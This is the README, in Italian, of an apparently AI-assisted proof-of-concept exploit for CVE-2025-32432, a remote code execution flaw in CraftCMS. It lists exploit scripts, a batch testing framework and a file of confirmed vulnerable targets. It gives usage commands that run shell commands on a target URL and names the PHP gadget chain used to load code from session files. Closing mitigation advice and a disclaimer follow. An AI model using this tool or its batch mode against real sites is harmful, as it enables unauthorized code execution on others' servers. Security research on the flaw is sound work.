
poc di CVE-2025-32432 generato dalla riparazione AI
Strumento di sfruttamento di vulnerabilità di esecuzione remota di codice per CraftCMS basato sulla ricerca di SensePost.
final_poc.py - POC ottimizzato finale
test.py - Versione semplificata basata sull'articolo originale di SensePost
yii\rbac\PhpManagerautomated_testing.py - Framework di test automatizzato
exploit_summary.md - Riepilogo dell'analisi della vulnerabilitàtest_results.json - Risultati dei test automatizzativulnerable.txt - Elenco degli obiettivi con vulnerabilità confermata# Test POC base
python3 final_poc.py https://target.com/ id
# Modalità debug
python3 final_poc.py https://target.com/ "whoami" --debug
# Versione semplificata
python3 test.py https://target.com/ "ls -la"
# Crea file dei target
python3 automated_testing.py --create-targets
# Esegui test in batch
python3 automated_testing.py
GuzzleHttp\Psr7\FnStream per chiamare phpinfo()yii\rbac\PhpManager per caricare codice PHP dal file di sessioneAggiornare CraftCMS alle versioni corrette:
Abilitare Site Lock per proteggere il pannello admin
Limitare i permessi di accesso ai file di sessione
Distribuire regole WAF per rilevare payload dannosi
Questo strumento è destinato esclusivamente alla ricerca sulla sicurezza e a test di penetrazione autorizzati. L'utente è tenuto a rispettare le leggi e i regolamenti locali e non deve utilizzarlo per scopi illegali.